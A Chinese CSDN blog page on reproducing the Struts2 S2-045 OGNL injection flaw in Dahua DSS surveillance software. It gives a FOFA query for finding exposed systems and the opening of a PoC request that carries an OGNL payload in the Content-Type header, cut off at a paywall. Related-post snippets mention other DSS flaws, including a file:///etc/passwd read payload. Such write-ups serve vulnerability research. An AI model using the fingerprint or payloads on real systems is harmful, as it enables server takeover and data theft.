漏洞复现-大华dss struts2-045表达式注入漏洞（附漏洞检测脚本）

最新推荐文章于 2024-11-24 15:25:57 发布

炼金术师诸葛亮

最新推荐文章于 2024-11-24 15:25:57 发布

阅读量1.8k

点赞数 10

文章标签：安全 web安全

本文链接：https://blog.csdn.net/jjjj1029056414/article/details/134899127

版权

免责声明

文章中涉及的漏洞均已修复，敏感信息均已做打码处理，文章仅做经验分享用途，切勿当真，未授权的攻击属于非法行为！文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，作者不为此承担任何责任，一旦造成后果请自行负责

漏洞描述

大华DSS存在s2-45漏洞。

fofa语句

body="/portal/include/script/dahuaDefined/headCommon.js?type=index"&&title="DSS"

poc语句加检测

GET /admin/login_login.action HTTP/1.1
Host: 
Content-Type: %{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionCo

最低0.47元/天解锁文章

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

炼金术师诸葛亮

关注关注

10
点赞
踩
8

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

【漏洞复现】大华DSS视频管理系统信息泄露漏洞

晚风不及你

02-20

2823

大华DSS数字监控系统是一个在通用安防视频监控系统基础上设计开发的系统，除了具有普通安防视频监控系统的实时监视、云台操作、录像回放、报警处理、设备治理等功能外，更注重用户使用的便利性。

【漏洞复现】大华DSS数字监控系统Struct2-045命令执行漏洞

晚风不及你

03-07

1238

参与评论您还未登录，请先登录后发表或查看评论

大华DSS城市安防监控平台Struct2-045命令执行漏洞（含批量验证poc）

weixin_43567873的博客

04-11

479

大华DSS城市安防监控平台Struct2-045命令执行漏洞（含批量验证poc）

大华 DSS 登录接口Struct2-045漏洞复现 [附POC]

薛定谔嘚喵博客

12-18

855

大华 DSS只安防监控系统平台是一款集视频、报警、存储、管理于一体的综合安防解决方案。大华DSS安防 监控系统Q平台采用ApacheStruts2作为网站应用框架。大华 DSS 登录接口存在 Struct2-045漏洞，可执行系统命令并回显。由于应用程序框架存在远程命令执行漏洞，攻击者可以通过在上传文件时修改HTTP请求标头中的Content Type值来触发该漏洞，然后执行该漏洞。系统命令以获取服务器权限。

大华DSS user_toLoginPage.action命令执行漏洞

Keepb1ue的博客

07-07

775

大华DSS 数字监控系统是大华开发的一款安防视频监控系统，拥有实时监视、云台操作、录像回放、报警处理、设备管理等功能。大华存在前台命令执行漏洞，攻击者可以通过此漏洞获取服务器权限。

大华 DSS 城市安防数字监控系统 SQL 注入漏洞

Keepb1ue的博客

12-21

1732

大华DSS数字监控系统itcBulletin接口对传入的数据没有预编译和充足的校验，导致该接口存在SQL注入漏洞，可通过注入漏洞获取数据库敏感信息。

大华DSS S2-045 OGNL表达式注入漏洞复现

0xSec

12-08

1275

大华DSS安防监控系统平台采用ApacheStruts2作为网站应用框架。由于应用程序框架存在远程命令执行漏洞，攻击者可以通过在上传文件时修改HTTP请求标头中的Content Type值来触发该漏洞，然后执行该漏洞。系统命令以获取服务器权限。

【漏洞复现】大华DSS数字监控系统getAttList SQL注入漏洞

晚风不及你

03-05

876

【漏洞复现】大华DSS城市安防监控平台任意文件读取漏洞

晚风不及你

03-05

1111

大华DSS数字监控系统平台存在任意文件读取漏洞，攻击者可以通过此漏洞获取服务器上的任意文件，造成敏感信息泄露。

【复现】大华DSS信息泄露漏洞_15

fushuang333的博客

01-11

2349

【复现】大华DSS信息泄露漏洞，DSS是大华的大型监控管理应用平台，支持几乎所有涉及监控等方面的操作，支持多级跨平台联网等操作。

大华科技摄像头产品非授权访问漏洞技术分析与防护方案

02-10

大华科技摄像头产品非授权访问漏洞技术分析与防护方案

大华监控DSS存在SQL注入高危漏洞

wan___she__pi的博客

03-27

1011

大华DSS是大华的大型监控管理应用平台，支持几乎所有涉及监控等方面的操作，支持多级跨平台联网等操作。将视频监控、卡口拍照、区间测速、电子地图、违章查询系统等诸多主流应用整合，实现更加智能、便捷的分级查询服务。大华 DSS 数字监控系统 存在File.action SQL注入，黑客可以利用该漏洞执行任意SQL语句，获取敏感信息，造成危害。

【复现】大华 DSS 数字监控系统 任意文件读取漏洞_38

fushuang333的博客

02-03

1730

【复现】大华 DSS 数字监控系统 任意文件读取漏洞，通过提交专门设计的输入，攻击者就可以在被访问的文件系统中读取或写入任意内容。

大华 DSS 数字监控系统 user_edit.action 信息泄露漏洞复现

0xSec

05-30

1338

大华 DSS 数字监控系统 user_edit.action 接口处存在信息泄露漏洞。未经身份验证的远程攻击者可利用此漏洞读取后台管理员账号密码等信息，破解密码后可直接登录后台，使系统处于极不安全的状态。

大华 DSS 数字监控系统 itcBulletin SQL 注入漏洞复现

holyxp的博客

12-18

3424

大华 DSs 数字监控系统是大华开发的一款安防视频监控系统，拥有实时监视、云台操作、录像回放、报警处理、设备管理等功能。大华 DSS存在SQL注入漏洞，攻击者 pota/services/itcBuletin 路由发送特殊构造的数据包，利用报错注入获取数据库敏感信息。攻击者除了可以利用 SQL注入漏词获取数据库中的信息例如，管理员后台密码、站点的用户人人信息)之外，甚至在高权限的情况可向服务器中写入木马，进一步获取服务器系统权限poc验证是否存在漏洞如果你想查询用户名和密码。

Fastadmin框架短视频知识付费系统存在任意文件读取漏洞

最新发布

缘梦未来的博客

11-24

329

FastAdmin框架短视频系统/视频知识付费源码/附带小说系统系统视频支持包月、单独购买、观影卷等功能源码附带小说系统源码需要配置高服务器和VDN加速

大华城市安防监控系统平台管理存在任意文件下载漏洞

剁椒鱼头没剁椒的博客

02-14

3019

大华城市安防监控系统平台管理存在任意文件下载漏洞，攻击者通过漏洞可以下载服务器上的任意文件。刷新登录页面进行抓包，然后在数据包中添加POC。大华城市安防监控系统平台管理。

大华城市安防系统平台任意文件下载漏洞

CommputerMac的博客

10-06

997

大华城市安防监控系统平台是一款集视频、报警、存储、管理于一体的综合安防解决方案。该平台支持多种接入方式，包括网络视频、模拟视频、数字视频、IP电话、对讲机等。此外，该平台还支持多种报警方式，包括移动侦测、区域入侵、越线报警、人员聚集等。filePath=file:///etc/passwd，可下载文件。大华城市安防监控系统平台管理存在任意文件下载漏洞，攻击者通过漏洞可以下载服务器上的任意文件。关注微信公众号网络安全透视镜回复 20231007 获取检测利用脚本。

【漏洞复现】大华-DSS-attachment_downloadByUrlAtt-文件读取

知黑而守白

02-01

187

DSS是大华的大型监控管理应用平台，支持几乎所有涉及监控等方面的操作，支持多级跨平台联网等操作。可将视频监控、卡口拍照、区间测速、电子地图、违章查询系统等诸多主流应用整合在一起，实现更加智能、便捷的分级查询服务。大华DSS attachment_downloadByUrlAtt 接口存在一个任意文件读取漏洞，攻击者可以通过构造精心设计的请求，成功利用漏洞读取服务器上的任意文件，包括敏感系统文件和应用程序配置文件等。通过利用此漏洞，攻击者可能获得系统内的敏感信息，导致潜在的信息泄露风险。